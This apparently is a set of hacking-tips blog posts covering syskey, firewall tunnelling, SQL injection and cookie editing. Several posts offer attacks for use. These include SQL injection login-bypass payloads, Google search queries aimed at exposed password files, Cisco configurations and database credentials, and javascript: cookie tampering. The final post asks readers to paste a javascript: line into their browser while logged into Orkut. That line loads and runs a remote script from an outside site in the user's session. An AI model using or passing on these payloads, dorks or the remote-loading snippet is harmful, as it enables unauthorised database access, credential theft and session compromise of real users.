Preventing access to your computer

Well you might answer this question by saying that just apply password to user accounts and you are done!!! But this method is not that secure what you think as this method gives the cracker the user names in the system, and obviously if you have guest account enabled then you may have invited a big problem. For completely securing your computer you should apply the password at computer startup. Which mean when you switch on your machine it will ask you for your password. Which indeed is more secure. So here we go

1. Click Start->Run then write syskey.
2. A dialog box will appear click update over there
3. Then select the password start up in the new dialog box which came after selecting update
4. Then type in the password and confirm it and press OK.
5. You are done but don't ever forget your password else you won't be able to start your computer.

Yahoo Messenger from behind a firewall

How to use Yahoo Messenger from behind a firewall (but with proxied access)

1.Download httptunnel (dont ask me just Google it) , compile and install on a *nix machine you have handy on the net somewhere (this is the tricky bit).

2. Set httptunnel up to forward from an "allowed out" port (eg https 443 or snews 563) to yahoo's servers (scs.yahoo.com port 5050) like so:

hts --forward-port scs.yahoo.com:5050 563

3. Set up your messenger client with the address & port of your server. ie your.machine.com port 563.

4. (optional) Firewall off the port so only you can connect to it

Basic SQL injection

An SQL injection attack consists of insertion of an SQL query via the input data from the client to the application.A successful SQL injection exploit can read data from the database, modify database data , execute administration operations on the database (such shutdown the DBMS), and in some cases issue commands to the operating system.

SQL Injection attacks are of three types:

• Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page
• Out-of-band: data is retrieved using a different channel (e.g.: an email with the results of the query is generated and sent to the tester)
• Inferential: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behaviour of the DB Server

Example:


For example a web page executes the following query

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

suppose we write the following in the username and password field of the form

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The resultant query will be

SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'

clearly this will always return true and hence whole database will be shown to the user
(the database table used in this particular query)

But sometimes the DBA is clever he may write query like this one

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case, there are two problems, one due to the use of the
parenthesis and one due to the use of MD5 hash function. First of all
we resolve the problem of the parenthesis. That simply consist of
adding a number of closing parenthesis until we obtain a corrected
query. To resolve the second problem we try to invalidate the second
condition.

The resulting query will be
$username = 1' or '1' = '1'))/*
$password = abc

Note:In Oracle use "--" instead of "/*"

the resulting query will be

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password'))) 

This was basic SQL injection but you will rarely find a website on which these injection
techniques will be working. Watch out for advanced SQL injection techniques in new posts.


आशीष कुमार 

Google Hacking

Google is a really good search engine. It crawls your website very effeciently, so efficiently that it reads each and every page of your site except you block that!!! so there is a good chance that it will also read some files which are confidential like passwords files. But even then there ways to find them but we will concentrate here on finding those files via Google. The basic rule is find some common names which a web administrator could keep of these confidential files. Over past, I have found some good file names which can be searched on Google. Obviously you need to know some of the basic web programming to understand the code in these files( and some time encryption too :) ). But the bottom line is you can access these files very easily. Below are some queries which were working till now( but you can never be sure!!!) although web administrators are really clever they too know about these queries and block them as soon as possible. So some of these queries may not give you good results.

Here they go( search on Google for the following)

1) ext:ini eudora.ini
2)ext:inc “pwd=” “UID=”
3)ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn ( This one sucks now!!!!)
4)index.of.etc ( a very good for finding /etc/pwd on linux
5)enable password | secret “current configuration” -intext:the ( give configration file for CISCO very useful in finding the network structure)
6)eggdrop filetype:user user ( useful for IRC usenames and passwords)
7) intitle:index.of config.php ( a really good one for database access)

this was all folks watch out for more.... thanks you are free to comment

* disclaimer: use at your own risk.

Cookie editing through javascript injection

JS injection is a technique which allows you to alter the content of a site without leaving the site. This can be used to spoof the server which is using javasript.

Requirements
1) A javascript enabled browser ( I will say use Mozilla Firefox)
2) A webpage which uses cookies ( For ex orkut)

Procedure

First check that the site has any cookie do this by

javascript:alert(document.cookie);

after this you will get an alert box showing you the cookie of the site with various fields

to edit the cookie use the following script

javascript:void(document.cookie="fieldname=value");

replace fieldname with the name of the field which you want to alter and value with the altered value

and you have just edited the cookie!!! you can verify it by usin alert(document।cookie) option.

आशीष कुमार

Send scraps to all your friends without any ad

There are many scripts which claim to send scraps to all your friends. But most of them send scraps with a line written below " TO SEND SCRAPSA TO ALL YOUR FRIENDS CLICK HERE" and your are caught that you havent send any personalised scrap to your friend instead you have used a script for the purpose but the following script do the job neatly without any ad!!!!

To use the scrips follow the followin steps
1. Login to your orkut acccount.
2. Copy the script given below.
3. Paste the script on the address bar of the browser while orkut home page opened
4. Send scrap without any add!!!!!

Here is the script
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://bitsnbytes.org.in/data/scrap%20all.txt';void(0)

ENJOY!!!!

आशीष कुमार